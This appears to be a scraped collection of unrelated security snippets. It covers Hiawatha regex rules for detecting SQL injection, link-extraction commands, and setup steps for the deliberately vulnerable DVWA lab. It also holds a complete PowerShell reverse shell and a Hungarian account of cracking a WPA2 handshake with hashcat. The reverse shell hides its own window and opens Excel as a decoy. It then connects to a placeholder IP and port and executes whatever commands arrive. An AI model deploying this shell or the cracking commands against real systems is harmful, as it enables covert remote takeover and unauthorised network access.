Hiawatha webserver PreventSQLi Patterns

'\s*--(\s|')
'\s*(and|or|xor|&&|\|\|)\s*\(?\s*('|[0-9]|`?[a-z\._-]+`?\s*(=|like)|[a-z]+\s*\()
'\s*(not\s+)?in\s*\(\s*['0-9]
union(\s+all)?(\s*\(\s*|\s+)select(`|\s)
select(\s*`|\s+)(\*|[a-z0-9_\, ]*)(`\s*|\s+)from(\s*`|\s+)[a-z0-9_\.]*
insert\s+into(\s*`|\s+).*(`\s*|\s+)(values\s*)?\(.*\)
update(\s*`|\s+)[a-z0-9_\.]*(`\s*|\s+)set(\s*`|\s+).*=
delete\s+from(\s*`|\s+)[a-z0-9_\.]*`?

Extract Links from a Web Page

Command Line

Extracting links from a page can be done with a number of open source command line tools. lynx a text based browser is perhaps the simplest.

lynx -listonly -dump url.example.com

API for the Extract Links Tool

Another option for accessing the extract links tool is to use the API. Rather than using the above form you can make a direct link to the following resource with the parameter of ?q set to the address you wish to extract links from.

https://api.hackertarget.com/pagelinks/?q=websitetotest.com

How To Setup DVWA Using Windows XAMPP

Download and install XAMPP on your computer.

Download DVWA, then extract the zip file to the htdocs folder.

In \xampp\htdocs\dvwa\config directory rename config.inc.php.dist to config.inc.php, and search line

$_DVWA[ 'db_password' ] = 'p@ssw0rd';

and change to (empty password).

Edit \xampp\php\php.ini file, search line

allow_url_include=Off

and change to On.

Then open the XAMPP control panel and start “Apache” and “MySQL” service.

Open the web browser, then go 127.0.0.1/DVWA. Click on “Create/Reset Database” button in browser…

Go!

Powershell reverse shell example code

Add-Type -Name win -MemberDefinition ‘[DllImport(“user32.dll”)] public static extern bool ShowWindow(int handle, int state);’ -Namespace native
[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle,0)
Invoke-Item “C:\Program Files\Microsoft Office\Office15\excel.exe”
Set-Location c:\windows\system32
$client = New-Object System.Net.Sockets.TCPClient(“public_IP”,public_port);
$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + “PS ” + (pwd).Path + “> “;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};
$client.Close()

Of’course change the public_IP and public_port variable, and Invoke-Item application path!

Hashcat 3.x rule nem működik WPA2 törésnél?

Előzmény:

Tanulás, feladat: Adott egy ‘baráti’ WPA2 hálózat, elmentett HCPX file. Mivel a feladat a hashcat (rule-ok) gyakorlása, az SSD jelszó páros ismert. A capture folyamán az előkészítés is megtörtént, a fájl tartalmaz minden szükséges adatot.

Ami adott:

  • Hashcat 3.6
  • HCPX capture fájl
  • A jelszó egy magyar keresztnév, két számjeggyel kiegészítve, első betű nagybetű.

Első próbálkozás:

Crunch-al létrehozott rule fájl ($%$%), illetve a magyar keresztnevek becézett alakjainak wordlistje.

Parancs:

hashcat -a 0 -m 2500  Becenevek-BP.txt -r 11.rule

Hashcat pörög, majd pár másodperc múlva végez, közli hogy nem talált megfelelő jelszót:

Semmi gond, valami rossz a rule-ban, vagy pedig a wordlist-ben…

Többszöri próbálkozás, és erős emlegetése az ismert (később ismeretlenek is) vallások fel és lemenőinek után eljutottam oda, hogy a megkérdezzük a jelszót.

Oké, jelszó megvan (Henike95). A wordlist tartalmazza a ‘Henike’ szót, a rule pedig a ’95’ szabályt, így működnie kellene… Mondom kell!

Még egyszer…

Persze, így se jó.

Gondolkozás… (+1 kadarka)

Hashcat –stdout paraméterével legeneráltam a használt jelszavakat, hátha… Persze tartalmazta, ezzel nincs gond…

Többszöri próbálkozás után eljutottam oda hogy a wordlist csak a ‘Henike’ szót tartalmazza, a rule pedig a ‘$9$5’ szabályt…

Így se találja…

Ha kézzel beírom, vagy pedig direktben megadom a wordlistben a jelszót, akkor persze kipörgeti…

Oké, akkor valahol mégiscsak a rule megadás környéken lehet a gond.

Kínlódás: -j paraméter, -k paraméter (Tudom, de hátha…)

Ugyanaz…. 😦

+1 kadarka

Jó, nincs más hátra, olvassuk el a readme-ket.

WP2 spec…

RC4 spec…

Semmi különös, nincs ötlet…

Mégegyszer…

Ötlet: a WPA2 jelszó minimum hossza 8 karater… A Henike95 meg 8 hosszú, akkor ez jó…. (másként nem is lehetett volna megcsinálni a WPA2 AP-t…)

+1 kadarka

Hashcat kimenet hosszas, hozzáértő (gyk.: pixeleket már külön látod) bámulása…

HOPPÁ!

Hát mi ez istentelen nagy szám a Rejected után ? Mit dobál ez el?

Hashcat doksi olvasása…

Aham, tehát ami nem tetszik neki az adott algoritmushoz (gyk.: -m 2500) azt eldobja…

De miért dob el ennyit?

Pár újabb rule és wordlist teszt után kiderült, hogyha a wordlist-ben csak a Henike van, a rule-ban pedig csak a $9$5, akkor is eldobja… Mind az egyet…

Pár extra wordlist/rule páros, meg 1 kadarka után a következő derült ki:

A hashcat veszi az algoritmus paramétereit, ebből előállít egy szűkítést (ebben az esetben azt, hogy a jelszó NEM lehet 8 karakternél rövidebb).

A probléma az, hogy  a jelszó hosszát nem a rule-al kiegészítve nézi, hanem a kiinduló wordlist-ben előforduló szó hosszát.

Mivel a wordlistben a Henike szerepelt, ezért eldobta, mivel csak 6 karakter hosszú…

Ennyi…

hashcat32 --stdout -r 11.rule Becenevek-BP.txt | hashcat64 -a 0 -m 2500 wpa0701-01.hcpx

Működik, jelszó kipörgetve.

A wordlistben kiegészítve a szavakat minimum 8 karakterre, majd a ] parancsot megfelelő számban használva a rule-ban, szintén megfelelő eredmény érhetünk el…